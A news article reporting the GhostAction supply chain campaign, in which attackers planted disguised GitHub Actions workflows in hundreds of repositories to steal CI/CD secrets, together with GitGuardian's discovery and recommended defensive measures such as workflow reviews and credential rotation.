Cyber-Attack Campaign Ghostaction Targets Github Workflows - Arabian Post
Security investigators uncovered a sweeping campaign named GhostAction supply chain campaign that compromised 327 GitHub user accounts across 817 repositories on 5 September 2025. Attackers inserted deceptive workflow files, disguised as security enhancements, into projects-including the open-source FastUUID library-extracting and exfiltrating 3,325 secrets such as PyPI, npm and DockerHub tokens to an external server.
The campaign began when GitGuardian noted a suspicious commit on 2 September by the GitHub user Grommash9. The change, titled“Add Github Actions Security workflow”, embedded a workflow that captured PyPI API tokens and sent them to a specified HTTP endpoint. Although the workflow was executed, no malicious package uploads were detected in the FastUUID project during the compromised timeframe. By midday on 5 September, PyPI placed the project into read-only mode, and the malicious commit was promptly reverted.
Further analysis revealed that this tactic was systematic: attackers inspected legitimate CI/CD pipelines within targeted repositories to identify secret names, then crafted tailored malicious workflows to capture credentials on push or manual trigger. In total, more than 3,300 secrets-spanning DockerHub credentials, personal access tokens, npm authentication tokens, PyPI keys, AWS credentials, database logins, and Cloudflare API tokens-were stolen across over eight hundred repositories.
This breach exposed a critical weakness in the current CI/CD security model: the assumption that automated workflows are inherently benign. The GhostAction supply chain campaign underscores how trusted automation can be weaponised to harvest sensitive credentials undetected.
Developers and organisations need to urgently enforce stricter controls over GitHub Actions. Measures such as mandatory code reviews for workflow changes, branch protection rules, automated secret scanning and frequent rotation of credentials are vital to mitigate such threats.
See also AI Tool Flags Over 1,000 Dubious Scientific Journals Notice an issue? Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com . We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity. Legal Disclaimer:
MENAFN provides the
information “as is” without warranty of any kind. We do not accept
any responsibility or liability for the accuracy, content, images,
videos, licenses, completeness, legality, or reliability of the information
contained in this article. If you have any complaints or copyright
issues related to this article, kindly contact the provider above.
Most popular stories
Market Research

- Excellion Finance Scales Market-Neutral Defi Strategies With Fordefi's MPC Wallet
- United States Lubricants Market Growth Opportunities & Share Dynamics 20252033
- Japan Skin Care Products Market Size Worth USD 11.6 Billion By 2033 CAGR: 4.18%
- Spycloud Launches Consumer Idlink Product To Empower Financial Institutions To Combat Fraud With Holistic Identity Intelligence
- Cartesian Launches First Outsourced Middle-Back-Office Offering For Digital Asset Funds
- United States Fin Fish Market Size Forecast With Demand Outlook 20252033
Comments
No comment